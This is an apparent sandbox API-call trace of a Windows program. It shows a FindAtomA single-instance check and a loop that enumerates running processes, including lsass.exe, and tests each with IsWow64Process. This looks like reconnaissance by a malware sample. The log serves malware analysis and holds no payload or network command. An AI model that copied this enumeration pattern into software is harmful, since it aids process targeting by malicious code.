	[0074.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.182] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.182] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.182] GetLastError () returned 0x5
	[0074.183] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.183] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetLastError () returned 0x5
	[0074.184] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.184] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.184] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.184] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.185] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.185] CloseHandle (hObject=0x224) returned 1
	[0074.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.185] CloseHandle (hObject=0x224) returned 1
	[0074.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eae0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.185] CloseHandle (hObject=0x224) returned 1
	[0074.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0074.228] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.232] CloseHandle (hObject=0x224) returned 1
	[0074.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.232] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.232] CloseHandle (hObject=0x224) returned 1
	[0074.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.233] CloseHandle (hObject=0x224) returned 1
	[0074.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.233] CloseHandle (hObject=0x224) returned 1
	[0074.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.233] CloseHandle (hObject=0x224) returned 1
	[0074.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.233] CloseHandle (hObject=0x224) returned 1
	[0074.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.233] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.234] CloseHandle (hObject=0x224) returned 1
	[0074.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.234] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.234] CloseHandle (hObject=0x224) returned 1
	[0074.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.234] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.234] CloseHandle (hObject=0x224) returned 1
	[0074.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.234] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.234] CloseHandle (hObject=0x224) returned 1
	[0074.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.234] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.234] CloseHandle (hObject=0x224) returned 1
	[0074.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.235] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.235] CloseHandle (hObject=0x224) returned 1
	[0074.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.235] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.235] CloseHandle (hObject=0x224) returned 1
	[0074.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dbb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.235] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.235] CloseHandle (hObject=0x224) returned 1
	[0074.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728838, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.235] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.235] CloseHandle (hObject=0x224) returned 1
	[0074.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb08, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.236] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.236] CloseHandle (hObject=0x224) returned 1
	[0074.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.236] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.236] CloseHandle (hObject=0x224) returned 1
	[0074.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.236] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.236] CloseHandle (hObject=0x224) returned 1
	[0074.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.236] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.236] CloseHandle (hObject=0x224) returned 1
	[0074.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
